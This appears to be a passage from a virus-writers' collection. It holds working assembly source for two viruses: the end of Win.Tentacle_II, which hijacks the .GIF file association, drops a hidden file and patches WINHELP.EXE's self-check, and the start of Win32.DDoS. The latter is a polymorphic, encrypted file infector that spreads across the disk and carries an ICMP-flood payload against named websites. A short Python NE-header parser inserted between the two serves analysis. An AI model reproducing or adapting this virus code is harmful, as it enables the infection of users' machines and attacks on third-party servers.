add dword ptr [bp.tmp_buffer+0],647D57A0h
lea dx,[bp.tmp_buffer] ; Load effective addr
CALL search_module_name
JC end_EPO
mov dx,64h ; ordinal of THUNRTMAIN API

search_API_reference:
push ax ; save AX (module index)
push dx ; save DX (API function ordinal)

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+22h] ; segment table offset
; (relative to NE header)
add eax,[bp.new_header_offs]; EAX=segment table offset (relative
; to file start)
xor ecx,ecx ; ECX=0
mov cx,word ptr [bp.rw_buffer+16h] ; entry code segment index
dec cx ; make segment counter start at zero
shl ecx,3 ; multiply with 8 (segment table
; entry size)
add eax,ecx ; EAX=offset of entry code segment
; descriptor (from filestart)
push eax ; CX:DX=EAX
pop dx
pop cx
mov ax,4200h ; go to descriptor of entry code segm
int 21h

pop dx ; restore DX (API function ordinal)


pop ax ; restore AX (module index)
JC end_EPO
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift

push bp ; save BP (main data stack frame)


sub sp,size EPO_stack_frame ; create new data buffer on stack
mov bp,sp ; and set BP to it

push cx ; save CX (alignment shift)


mov [bp.module_index],ax ; save module index
mov [bp.API_ordinal],dx ; save API function ordinal

mov ah,3Fh ; read entry code segment descriptor


mov cx,8 ; size of a segment descriptor
lea dx,[bp.entry_CS_offset] ; DS:DX=pointer to read buffer
int 21h
pop cx ; restore CX (alignment shift)
JC EPO_failed

xor edx,edx ; EDX=0


mov dx,[bp.entry_CS_offset] ; EDX=segment file offset (aligned)
shl edx,cl ; EDX=segment file offset (in bytes)
xor eax,eax ; EAX=0
mov ax,[bp.entry_CS_phys] ; EAX=segment physical size
add edx,eax ; EDX=file offset of segment relocs
mov [bp.entry_CS_relocs],edx; save it

push edx ; CX:DX=EDX


pop dx
pop cx
mov ax,4200h ; go to entry code segment relocations
int 21h
JC EPO_failed

mov ah,3Fh ; read number of relocation items


mov cx,2 ; read one word
lea dx,[bp.relocs_number] ; DS:DX=pointer to read buffer
int 21h
JC EPO_failed

xor ecx,ecx ; ECX=0


JMP check_if_all_relocs_done

search_API_reference_loop:
push cx ; save CX

mov ah,3Fh ; read a relocation item


mov cx,8 ; size of relocation item
lea dx,[bp.reloc_type] ; DS:DX=ptr to read buffer
int 21h

pop cx
JC EPO_failed

mov eax,dword ptr [bp.module_index] ; EAX=module index and


; API ordinal
cmp [bp.reloc_what],eax
JNE check_next_reloc
cmp word ptr [bp.reloc_type],103h ; check relocation type: must
; be 32bit far ptr and API ordinal
JE found_API_reference
check_next_reloc:
inc cx
check_if_all_relocs_done:
cmp cx,[bp.relocs_number]
JNE search_API_reference_loop
JMP EPO_failed

found_API_reference:
mov edx,[bp.entry_CS_relocs]
add edx,2
shl ecx,3 ; ECX=ECX*8 (size of a reloc item)
add edx,ecx ; EDX=offset of reloc item in file
mov eax,dword ptr [bp.module_index]; EAX=module index/API ordinal

add sp,size EPO_stack_frame ; clear buffer from stack


pop bp ; restore old stack frame pointer
clc ; clear carry flag (indicate success)
JMP end_EPO

EPO_failed:
add sp,size EPO_stack_frame ; clear buffer from stack
pop bp
stc ; set carry flag (indicate error)

end_EPO:
RET

gif_body:
include gif.inc ; the body of the gif file converted
; to DB instructions
gif_body_size EQU ($ - offset gif_body)
shell_open_command db "\SHELL\OPEN\COMMAND", 0
l_shell_open_command EQU ($ - offset shell_open_command)

; ----- PAYLOAD -------------------------------------------------------------

payload:
push es ; save ES
push bp ; save BP (main stack frame pointer)

sub sp,size payload_stack_frame ; reserve room on stack


mov bp,sp ; setup new stack frame

push ax ; save AX (what to do flag)

;* push dword ptr 1 ; HKEY_CLASSES_ROOT (=1 in Win16 shellapi.h; the
; .GIF file association lives there)
db 66h,68h,1,0,0,0 ; fixup - byte match

mov word ptr [bp.reg_buffer2],"G."; name of the subkey: ".GIF",0


mov dword ptr [bp.reg_buffer2+2],"FI"
push ss ; push a far pointer to the name
lea ax,[bp.reg_buffer2] ; of the subkey
push ax

push ss ; push a far pointer to the buffer


lea ax,[bp.reg_buffer1] ; that will hold the return string
push ax

mov [bp.size_reg_buffer],40h; size of buffer for return string


push ss ; push a far pointer to the
lea ax,[bp.size_reg_buffer] ; dword that holds the size for the
push ax ; return string

CALL cs:RegQueryValue ; far call to the RegQueryValue API

or ax,ax ; zero means success


JZ RegQueryValue_success
pop ax ; clear stack
JMP exit_payload

RegQueryValue_success:
cmp byte ptr [bp.reg_buffer1],0; has it returned an empty string?
JE try_shell_open_command

push ss ; ES=SS
pop es

lea di,[bp.reg_buffer1] ; DI=offset of return string
cld ; clear direction flag
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0

push ds ; save DS
push cs ; DS=CS
pop ds

mov si,offset shell_open_command


CALL decrypt_path ; decrypt & append it to the result
; of the RegQueryValue call
pop ds ; restore DS
CALL call_RegQueryValue
or ax,ax ; zero means success
pop ax ; restore AX (entry flag)
JZ RegQueryValue_success2

try_shell_open_command:
mov word ptr [bp.reg_buffer1],"G."
mov dword ptr [bp.reg_buffer1+2],"FI"

push ds ; save DS

push cs ; DS=CS
pop ds

push ss ; ES=SS
pop es

mov si,offset shell_open_command


lea di,[bp.reg_buffer1+4] ; Load effective addr
mov cx,l_shell_open_command ; useless, the decrypt_path procedure
; gets the string length itself.
CALL decrypt_path
pop ds ; restore DS
CALL call_RegQueryValue
or ax,ax ; zero means success
pop ax
JNZ exit_payload

RegQueryValue_success2:
; reg_buffer2 now contains the command line of the program that is
; run whenever the user double-clicks a .GIF file

or ax,ax ; check the entry flag in AX


JZ restore_gif_commandline

push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
mov cx,ax ; CX=length of string
mov al,"%" ; search the commandline for where
; the name of the gif will be on
; program start
cld ; clear direction flag
repne scasb ; search for the % sign
JNZ exit_payload ; if not found, exit payload
cmp byte ptr [di],"1" ; is it the %1, like it has to be?
JNE exit_payload ; if not, something is wrong
cmp byte ptr [di-2],'"' ; is there the quotes sign?
JNE dont_skip_quotes
dec di ; if yes, skip it
dont_skip_quotes:
dec di ; go to the start of the first
; parameter in the commandline, the
; name of the .GIF file

mov dword ptr [di+9],"G.EL" ; create there the "C:\TENTACLE.GIF"


mov byte ptr [di],"C" ; string
mov dword ptr [di+5],7E00FD39h
mov dword ptr [di+0Dh],"FI"
add dword ptr [di+5],0C5405715h
mov dword ptr [di+1],"ET\:"
push di ; save DI (offs of "C:\TENTACLE.GIF")
CALL call_RegSetValue ; set the new value.

; from now on, every time the user double-clicks a gif file, it
; will only see C:\TENTACLE.GIF ;-)

mov ah,3Ch ; create C:\TENTACLE.GIF file


mov cx,7 ; readonly,hidden,system attributes
pop dx ; DS:DX=ptr to filename to create
; ("C:\TENTACLE.GIF")
int 21h
JC exit_payload

mov bx,ax ; handle to BX

mov word ptr [bp.reg_buffer2+2],"8F" ; create GIF marker in the


mov word ptr [bp.reg_buffer2+0],"IG" ; buffer ("GIF87a")
mov word ptr [bp.reg_buffer2+4],"a7"

mov ah,40h ; write GIF marker


mov cx,6 ; size of gif marker
lea dx,[bp.reg_buffer2] ; DS:DX=pointer to write buffer
int 21h

mov ah,40h ; write gif file body


mov cx,gif_body_size ; size to write
mov dx,offset gif_body ; DS:DX=pointer to write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS

mov ah,3Eh ; close file


int 21h

JMP exit_payload ; payload is done

restore_gif_commandline:
push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
cld ; clear direction flag
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
add di,ax
mov cx,ax ; CX=length of string
mov al," " ; search for the blank
std ; set direction flag
repne scasb ; search for the end of the filename
JNZ exit_payload ; if not found, exit
add di,2 ; go to 1st param (file to display)
cmp byte ptr [di],"C" ; is there "C:\TENTACLE.GIF"
JNE exit_payload ; if not, there's nothing to restore
cmp dword ptr [di+1],"ET\:" ; make really sure
JNE exit_payload
mov byte ptr [di],"%" ; restore the correct cmdline "%1"
mov word ptr [di+1],"1"
CALL call_RegSetValue ; set it.

exit_payload:
add sp,size payload_stack_frame ; free room on stack
pop bp ; restore BP (main stack frame ptr)
pop es ; restore ES
RET

call_RegQueryValue:
;* push dword ptr 1 ; HKEY_CLASSES_ROOT (=1 in Win16 shellapi.h)
db 66h,68h,1,0,0,0 ; fixup - byte match

push ss ; push a far pointer to the name


lea ax,[bp.reg_buffer1] ; of the subkey
push ax

push ss ; push a far pointer to the buffer


lea ax,[bp.reg_buffer2] ; that will hold the return string
push ax

mov [bp.size_reg_buffer],40h; size of buffer for return string


push ss ; push a far pointer to the
lea ax,[bp.size_reg_buffer] ; dword that holds the size for the
push ax ; return string

CALL cs:RegQueryValue ; far call to the RegQueryValue API

RET

call_RegSetValue:
;* push dword ptr 1 ; HKEY_CLASSES_ROOT (=1 in Win16 shellapi.h)
db 66h,68h,1,0,0,0 ; fixup - byte match

push ss ; push a far pointer to the name


lea ax,[bp.reg_buffer1] ; of the subkey
push ax

;* push dword ptr 1 ; REG_SZ (ASCIIZ string) is 1, which is what
; the bytes below actually push
db 66h,68h,1,0,0,0 ; fixup - byte match

push ss ; push a far pointer to the buffer


lea ax,[bp.reg_buffer2] ; that will hold the return string
push ax

;* push dword ptr 0 ; size of value data


db 66h,68h,0,0,0,0 ; fixup - byte match

CALL cs:RegSetValue ; far call to the RegSetValue API

RET
; ----- PATCH WINHELP -------------------------------------------------------

patch_winhelp:
cmp word ptr [bp.rw_buffer+1Ch],2 ; number of segments
JB exit_patch_winhelp ; it's not the WINHELP.EXE
; we know, don't patch it

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+22h] ; offset of segment table
; (relative to NE header)
add eax,[bp.new_header_offs] ; now relative to file start
;* add eax,8 ; go to 2nd segment descriptor
db 66h, 83h,0C0h, 08h ; fixup - byte match

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set filepointer to the
int 21h ; descriptor.

mov ah,3Fh ; read the aligned segment file offset


mov cx,2 ; read one word
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to read buffer
int 21h

xor eax,eax ; EAX=0


mov ax,word ptr [bp.tmp_buffer] ; EAX=aligned segment file offset
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
shl eax,cl ; EAX=segment file offset in bytes
;* add eax,22h ; go to offset 22h in 2nd segment
db 66h,83h,0C0h,22h ; fixup - byte match

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set filepointer to offset 22h in
int 21h ; the second segment
JC exit_patch_winhelp

mov ah,3Fh ; read two bytes of program code


mov cx,2 ; size to read
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to read buffer
int 21h
JC exit_patch_winhelp

cmp word ptr [bp.tmp_buffer],1474h ; is it a JE $+16h ?


JNE exit_patch_winhelp ; if not, it's not the WINHELP.EXE
; we know, don't patch it.

mov ax,4201h ; set filepointer back to the


; conditional jmp
mov cx,-1 ; CX:DX=-2
mov dx,-2
int 21h

mov byte ptr [bp.tmp_buffer],0EBh ; a unconditional JMP SHORT

mov ah,40h ; patch the file with the


; unconditional JMP
mov cx,1 ; write one byte
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to the write buffer
int 21h

; WINHELP.EXE now has no self-check


; any more ;-)

exit_patch_winhelp:
RET

db 3 dup(0) ; maybe the author wanted the
; relocation addresses on an address
; divisible by 4 ?

RegQueryValue dd 0000FFFFh
RegSetValue dd 0000FFFFh
org_entry dd 0000FFFFh

virus_end:

; Most data of the virus is stored in a buffer on the stack. The following
; structure represents the lay-out of this stack frame:

stack_frame struc
dta db 2Bh dup(?)
tmp_buffer db 10 dup(?)
bytes_to_copy dd ?
full_filename db 24 dup(?)
full_filespec db 24 dup(?)
tmp_filename db 16 dup(?)
source_handle dw ?
dest_handle dw ?
file_date dw ?
file_time dw ?
file_size dd ?
new_header_offs dd ?
end_of_NE_hdr dd ?
alignment_unit dd ?
first_segm_offs dd ?
new_sect_descr dw 4 dup(?)
rw_buffer db 64 dup(?)
dw ?
our_reloc_offs dd ?
module_ordinal dd ?
new_entry_CS dw ?
new_entry_IP dw ?
stack_frame ends

; The data that is used in the EPO engine of the virus uses another stack
; frame that is represented in this structure:

EPO_stack_frame struc
entry_CS_offset dw ?
entry_CS_phys dw ?
entry_CS_flags dw ?
entry_CS_virt dw ?
reloc_type dw ?
reloc_offs dw ?
reloc_what dd ?
module_index dw ?
API_ordinal dw ?
entry_CS_relocs dd ?
relocs_number dw ?
EPO_stack_frame ends

; Also the payload routine uses its own stack frame:

payload_stack_frame struc
reg_buffer1 db 40h dup(?)
reg_buffer2 db 40h dup(?)
size_reg_buffer dd ?
payload_stack_frame ends

first_gen_entry:
push ds ; save DS
pusha ; save all registers

push ss ; DS=SS
pop ds

sub sp,size stack_frame ; reserve room on stack


mov bp,sp ; setup stack frame

mov ah,1Ah ; set DTA to DS:DX


lea dx,[bp.dta] ; Load effective addr
int 21h

mov si, offset exe_wildcard ; encrypt all the strings in the


call encrypt_wildcard ; virus by a simple inc/dec
mov si, offset scr_wildcard ; algorithm
call encrypt_wildcard

mov si, offset C_win


call encrypt_path
mov si, offset C_windows
call encrypt_path
mov si, offset C_win31
call encrypt_path
mov si, offset C_win311
call encrypt_path
mov si, offset C_win95
call encrypt_path
mov si, offset shell_open_command
call encrypt_path

mov bx,0FFFFh
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect all EXE files in current dir

mov ah,9
mov dx,offset first_gen_message
int 21h

mov ax,4C00h
int 21h

first_gen_message db "Win.Tentacle_II virus dropped", 0Dh, 0Ah, "$"

end first_gen_entry
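Added example, not part of the zine or of the Tentacle_II listing: a small Python NE parser that reads the same header fields the EPO engine and patch_winhelp read (entry CS at NE+16h, segment count at NE+1Ch, segment table at NE+22h, alignment shift at NE+32h, 8-byte segment descriptors, relocation table after the segment data). An analyst can use it to list an entry segment's import relocations or to check whether the self-check JE at offset 22h of segment 2 of a WINHELP.EXE is still intact. The NE image below is constructed, and the assumption that KERNEL is module index 1 is mine; the parser additionally checks the NSRELOC flag, which the EPO engine skips.

```python
import struct

NSRELOC = 0x0100   # segment flag: relocation records follow the segment data


def build_sample_ne() -> bytes:
    """Constructed minimal NE image (not a real Windows binary)."""
    img = bytearray(0x170)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)        # e_lfanew -> NE header
    ne = 0x40
    img[ne:ne + 2] = b"NE"
    struct.pack_into("<H", img, ne + 0x16, 1)      # entry point CS = segment 1
    struct.pack_into("<H", img, ne + 0x1C, 2)      # number of segments
    struct.pack_into("<H", img, ne + 0x22, 0x40)   # segment table, rel. to NE hdr
    struct.pack_into("<H", img, ne + 0x32, 4)      # alignment shift: 16-byte sectors
    segtab = ne + 0x40
    # seg 1: sector 0x10 (file 0x100), 0x20 bytes, has relocations
    struct.pack_into("<HHHH", img, segtab, 0x10, 0x20, NSRELOC, 0x20)
    # seg 2: sector 0x14 (file 0x140), 0x30 bytes, no relocations
    struct.pack_into("<HHHH", img, segtab + 8, 0x14, 0x30, 0, 0x30)
    img[0x100:0x120] = b"\x90" * 0x20              # segment 1 code (nops)
    # relocation table right behind segment 1: count word, then 8-byte records
    # record = source type, target type, offset in segment, module index, ordinal
    struct.pack_into("<H", img, 0x120, 2)
    struct.pack_into("<BBHHH", img, 0x122, 0x03, 0x01, 0x0003, 1, 0x10)
    struct.pack_into("<BBHHH", img, 0x12A, 0x03, 0x01, 0x000A, 1, 0x5B)  # KERNEL.InitTask
    img[0x140:0x170] = b"\x90" * 0x30              # segment 2 code
    img[0x162:0x164] = b"\x74\x14"                 # JE $+16h at offset 22h of seg 2
    return bytes(img)


def ne_header(img: bytes) -> int:
    """File offset of the NE header, or ValueError if this is not an NE file."""
    if img[:2] != b"MZ":
        raise ValueError("not an MZ file")
    ne = struct.unpack_from("<I", img, 0x3C)[0]
    if img[ne:ne + 2] != b"NE":
        raise ValueError("no NE header")
    return ne


def segment_entry(img: bytes, index: int):
    """1-based segment index -> (file offset in bytes, length, flags)."""
    ne = ne_header(img)
    count = struct.unpack_from("<H", img, ne + 0x1C)[0]
    if not 1 <= index <= count:
        raise IndexError("segment index out of range")
    segtab = ne + struct.unpack_from("<H", img, ne + 0x22)[0]
    shift = img[ne + 0x32]
    sector, length, flags, _ = struct.unpack_from("<HHHH", img, segtab + 8 * (index - 1))
    return sector << shift, length, flags


def entry_segment_relocs(img: bytes):
    """(relocation table offset, [(src_type, tgt_type, offset, target, record_offset)])."""
    ne = ne_header(img)
    cs_index = struct.unpack_from("<H", img, ne + 0x16)[0]
    start, length, flags = segment_entry(img, cs_index)
    if not flags & NSRELOC:          # the EPO engine never checks this
        return None, []
    table = start + (length or 0x10000)   # a length of 0 means 64K
    n = struct.unpack_from("<H", img, table)[0]
    recs = []
    for i in range(n):
        off = table + 2 + 8 * i
        src, tgt, loc, target = struct.unpack_from("<BBHI", img, off)
        recs.append((src, tgt, loc, target, off))
    return table, recs


def find_import_reloc(img: bytes, module_index: int, ordinal: int):
    """Offset of the record that references module_index.ordinal as a 32-bit
    far pointer (type word 0103h), or None. The target dword is module index
    in the low word and ordinal in the high word, as the EPO engine compares it."""
    wanted = (ordinal << 16) | module_index
    _, recs = entry_segment_relocs(img)
    for src, tgt, _, target, off in recs:
        if src == 3 and tgt == 1 and target == wanted:
            return off
    return None


def winhelp_selfcheck_state(img: bytes) -> str:
    """Inspect the two bytes at offset 22h of segment 2, the spot patch_winhelp rewrites."""
    ne = ne_header(img)
    if struct.unpack_from("<H", img, ne + 0x1C)[0] < 2:
        return "unknown"
    start, length, _ = segment_entry(img, 2)
    if length and length < 0x24:
        return "unknown"
    code = bytes(img[start + 0x22:start + 0x24])
    return {b"\x74\x14": "intact", b"\xEB\x14": "patched"}.get(code, "unknown")


if __name__ == "__main__":
    sample = build_sample_ne()
    print("reloc table at", hex(entry_segment_relocs(sample)[0]))
    print("InitTask reloc at", hex(find_import_reloc(sample, 1, 0x5B)))
    print("WINHELP self-check:", winhelp_selfcheck_state(sample))
```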
;
; ***************************************************************************
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
; ***************************************************************************
;
;
;
; Please note that it is illegal to spread viruses, so if you compile this
; code, just test it on a closed system and don't place it in the wild !
; I am not responsible for your actions .. as always ;)
;
;
;
;
; This is the first Windows Virus I've written so far, and some parts are from
; Win32.Aztec by Billy Belcebu, because at the time I wrote this thing, not everything
; was clear in my mind, as it is now, hope I can present you some better things from me
; in the future.
;
; This is also my first polymorphic virus ever ;) so don't expect too much from the
; poly engine. I did not understand much of the code from other poly engines, but
; now, after coding one on my own, I do, so I maybe can code a better one the next time ;)
;
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
; and try to keep track that they don't look completely useless.
; I also use several ways to decrypt the virus ( xor, neg, not .. ) and
; several methods to do the loop. The size will always be in ECX and
; the start in ESI, but i use several methods to put the values inside
; the registers so there is nothing static.
; The only static thing left is the call to the polymorphic decryptor ;(
;
;
; I was just able to test this thing on a Win95 PC, so I don't know if it will
; work on other systems, but I think it will. Two friends made some tests under
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
;
;
; It tries to get the 4 following API's:
;
; - Kernel32.dll <- the only one we really need to work, the others are for fun
;
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
; - Advapi32.dll <- get some data from the registry
; - Wsock32.dll <- Payload : Ping-flood a server
;
;
;
;
; What does this Virus do :
;
; - 1st generation infects just the current directory ( easier to infect just some files *eg* )
; - Gets APIs with LoadLibraryA & GetProcAddress
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function
; - Infects the current, the windows and the system directory and parses some
; random directories on drive C:
; - Follows LNK - Files ( does not work with NT / 2k )
; - Removes and restores File-Attributes
; - Parses Drive C:, enters a folder with a chance of 1 to 3
; - Retrieves the Start menu from registry and parses it ( follows LNK-Files there )
; - If everything runs well it will infect 100 files all over the disk
; - Generates a polymorphic decryptor which will be used for all files infected in one run
; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )
; - Does not infect files smaller than 40 kb
; - Will not infect files with AV, AN or DR in the filename
; - Payload is an ICMP flood on one of these servers :
;
; Sunday = www.bundesnachrichtendienst.de
; Monday = French Secret Service ( dgse.citeweb.net )
; Tuesday = www.avp.com ( AV )
; Wednesday = www.lockdown2000.com
; Thursday = www.f-secure.com
; Friday = www.norton.com
; Saturday = www.zonelabs.com
;
; *# Please note that I chose these servers because I think they can #*
; *# handle such an attack, if any idiot would release this into the wild. #*
;
;
;
;
;
;
; To make this code work, use TASM 5.0 and pewrsec.
;
;
;
;
;
;
; Thanks and greetz fly to these people:
;
; Billy Belcebu - Your Win32 VWG is just great ..
; ( you'll find some of your code [Win32.Aztec] here ;)
; Evul - Thanks for hosting my site at coderz.net
; Ciatrix - Hope you carry on your good work with VDAT !
; SnakeMan - Hope you get more entries *g* --> http://altavirus.cjb.net
; PhilippP - Thanks for the thrilling test in 2k .. ;)
; BumbleBee - Still thinking of Sex ?
; diediedie - Thnx for demotivating me... :)
; asmodeus - nice beginner lesson in poly ;)
; darkman - just believe me: the question was stupid ;)
;
;
;
;
;
; ***************************************************************************
; ---------------------------[ Here we start ]-------------------------------
; ***************************************************************************

.586p
.model flat
jumps ; Jumps get calculated
; ( I know not good for optimizing.. )
.radix 16 ; All numbers are Hexadecimal
; I once searched for a forgotten 'h'
; 2 weeks until I found this bug.. :P

; some API's
extrn ExitProcess:PROC ; fake host for 1. Generation

extrn MessageBoxA:PROC ; For testing purposes ( no longer needed )


; but i needed it for error-detection *g*
; 'cause I am too stupid to work with softice.. :(
.data ; fake data for TASM
db ? ; otherwise TASM would not compile this
; we store all our data in the code
; section, that's why we need to use
; pewrsec after compiling, to set the
; code section flags to write !

; some constants I don't want to calculate on my own *g*


VirusSize equ (offset VirusEnd - offset Virus )
CryptSize equ (offset VirusEnd - offset CryptStart )
NoCrypt equ (offset CryptStart - offset Virus )
FirstLSize equ (offset VirusEnd - offset FirstLayerStart )
Buffersize equ (offset EndBufferData - offset VirusEnd )

FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS

.code

; ***************************************************************************
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
; ***************************************************************************

Virus: ; Here we go

call PDecrypt ; call the poly decryption routine


; which is located at the end of virus
; just a simple 'ret' in the first generation

FirstLayerStart: ; here starts the first layer


; everything will be crypted from here on

call Delta ; let's get the delta - offset

Delta:
mov ebp, offset Delta ; I want to do this a bit different
neg ebp ; than usual, who knows, maybe this
pop eax ; fools some bad heuristics
add ebp, eax

or ebp, ebp ; we don't need to decrypt the 1.


jz CryptStart ; Generation

; save esp
mov dword ptr [ebp+XESP], esp

mov ecx, (CryptSize / 2) ; the length of the crypted part in words
mov dx, word ptr [ebp+Key]
lea esp, [ebp+CryptStart] ; set esp to the start of the decrypted part

DeCryptLoop: ; let's decrypt the virus


pop ax ; we pop the body word by word
inc dx ; this method fucks with debuggers, who
xchg dl, dh ; trace with int 1h ( destroys stack )
xchg al, ah
xor ax, dx
not ax
push ax
add esp, 2h
loop DeCryptLoop
; restore esp
mov esp, dword ptr [ebp+XESP]

jmp CryptStart ; start virus

Key dw 0h ; our key


XESP dd 0h ; we save the esp here

db 4 dup (90h) ; some nop's so we will not jump into an instruction
; ( happened sometimes during testing :( )
; because of the prefetch queue buffer ( or whatever this is spelled .. )
CryptStart:
; we save these two values ( EIP & Imagebase )
; to be able to return to the original host..
mov eax, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], eax
mov eax, dword ptr [ebp+OldBase]
mov dword ptr [ebp+retBas], eax

mov eax, dword ptr fs:[0] ; save the original SEH


mov dword ptr [ebp+SEH_Save], eax

mov esi, [esp] ; let's get the return address of the Create Process API
xor si, si ; round it to a full page

push dword ptr [ebp+Error_ExecuteHost]


mov fs:[0], esp ; set new SEH

call GetKernel ; try to get it


jnc GetApis ; If got it we try to retrieve the API's

; Otherwise, we try to check for


; the kernel at some fixed addresses
; But the way above should work most
; of the times.. :)

mov esi, 0BFF70000h ; try the Win95 Kernel Addy


call GetKernel
jnc GetApis

mov esi, 077F00000h ; try the WinNT Kernel Addy


call GetKernel
jnc GetApis

mov esi, 077e00000h ; try the Win2k Kernel Addy


call GetKernel
jnc GetApis
; if we still did not find the
jmp Error_ExecuteHost ; kernel we stop the virus
; and execute the goat

; ***************************************************************************
; -------------------------[ let's get the API's ]---------------------------
; ***************************************************************************

; These are the 2 API's we search in the Kernel


; we need them to get all the others API's
; I prefer LoadLibraryA to GetModuleHandle,
; because it is no longer necessary, that the
; file we infect loads the dll files we need,
; we load them on our own,... ;)
; This means, we can use almost any API we want to *eg*
; LoadLibraryA also returns the Module-Handle, but
; if it is not loaded it loads it ... bla.. ;P

LL db 'LoadLibraryA', 0h ; we need these API's for searching..


GPA db 'GetProcAddress', 0h

GetApis: ; Offset of the Kernel32.dll PE-Header is in EAX

mov [ebp+KernelAddy], eax ; Save it


mov [ebp+MZAddy], ebx

lea edx, [ebp+LL] ; Points to name of the LoadLibaryA - API


mov ecx, 0Ch ; Length of Name
call SearchAPI1 ; search it..
mov [ebp+XLoadLibraryA], eax
; Save the Addy

xchg eax, ecx ; If we didn't get this API or the other one, we quit !
jecxz ExecuteHost ; thnx to Billy ;)

lea edx, [ebp+GPA] ; Points to name of the GetProcAddress - API


mov ecx, 0Eh ; Length of Name
call SearchAPI1
mov [ebp+XGetProcAddress], eax
; Save the Addy

xchg eax, ecx ; check if we failed


jecxz ExecuteHost ; ( thnx again, nice way of optimization *g* )

; Now we have our 2 necessary API's
jmp GetAPI2 ; and are able to get the others
; Yes I know this jmp is not very optimizing.. ;)
; But storing the data here helps me understanding
; my code *bg*

; this dll is delivered with every version


KERNEL32 db 'Kernel32',0 ; of windows, so we will get it always ( ..most likely *g* )
; the virus relies on it

IMAGEHLP db 'Imagehlp',0 ; this dll is not necessarily needed, but dll's will
; only get infected, if we are able to use the CheckSumMappedFile
; Function from this dll to create a checksum
; it is delivered with win9x, NT and several compilers.

ADVAPI db 'advapi32',0 ; this dll is necessary to retrieve the start menu folder
; from registry, so we are able to follow the shortcuts there

WSOCK db 'wsock32.dll',0
; we need this one here to perform a ping
; ( not needed for the virus, but the payload )

GetAPI2: ; We get them, by grabbing the handles of


; different DLL's first and use GetProcAddress
; to locate the API's itself

; Let's get the Handles by calling


; the LoadLibrary API.. :)
; if we fail to get the
; Kernel32, we execute the
; original host
lea eax, [ebp+KERNEL32]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+K32Handle], eax
test eax, eax
jz ExecuteHost

lea eax, [ebp+IMAGEHLP]


push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+IHLHandle], eax

lea eax, [ebp+ADVAPI]


push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+ADVHandle], eax

lea eax, [ebp+WSOCK]


push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+W32Handle], eax

lea esi, [ebp+Kernel32Names]


lea edi, [ebp+XFindFirstFileA]
mov ebx, [ebp+K32Handle]
push NumberOfKernel32APIS
pop ecx
call GetAPI3

lea esi, [ebp+ImageHLPNames]


lea edi, [ebp+XCheckSumMappedFile]
mov ebx, [ebp+IHLHandle]
xor ecx, ecx
inc ecx
call GetAPI3

lea esi, [ebp+ADVAPI32Names]


lea edi, [ebp+XRegOpenKeyExA]
mov ebx, [ebp+ADVHandle]
push 3d
pop ecx
call GetAPI3

lea esi, [ebp+WSOCK32Names]


lea edi, [ebp+Xsocket]
mov ebx, [ebp+W32Handle]
push 3d
pop ecx
call GetAPI3

; ***************************************************************************
; ------------------[ Outbreak ! Here we start infecting ]-------------------
; ***************************************************************************

; Now we got everything we need to


; start infecting some files *eg*
; First of all we retrieve the
; foldernames of the current folder,
; the system folder, and the windows folder
; these are the folders we start to infect
lea edi, [ebp+curdir]
push edi
push 7Fh
call dword ptr [ebp+XGetCurrentDirectoryA]

call genPoly ; before we infect anything, we


; create a poly decryptor used for
; all files we infect = slow poly !

mov [ebp+InfCounter], 10d ; Number of files we want to infect !


call InfectCurDir ; first of all we infect the current directory

or ebp, ebp ; if this is the first generation, we infect just


jz ExecuteHost ; the first directory ( makes it easier to infect
; just some files .. *g*
; we also don't start the payload !

push 7Fh ; buffer - size


; 7fh = 127d = max length of Directory name
lea edi, [ebp+windir] ; Pointer to the offset where we save the directory
push edi
call dword ptr [ebp+XGetWindowsDirectoryA]

lea edi, [ebp+windir] ; then we infect the windows directory


push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
mov [ebp+InfCounter], 10d
call InfectCurDir

; we save both directories in the same buffer
push 7Fh ; so we save 127 Bytes of the Buffersize
lea edi, [ebp+windir]
push edi
call dword ptr [ebp+XGetSystemDirectoryA]

lea edi, [ebp+windir] ; and the system directory ..


push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
mov [ebp+InfCounter], 10d
call InfectCurDir

; if everything went fine, we have


; infected now up to 30 files !
; Is this enough ?
; ( please note that this is a rhetorical question *g* )
; We want more !

; ***************************************************************************
; -----------------------[ Parse Directory's ]-------------------------------
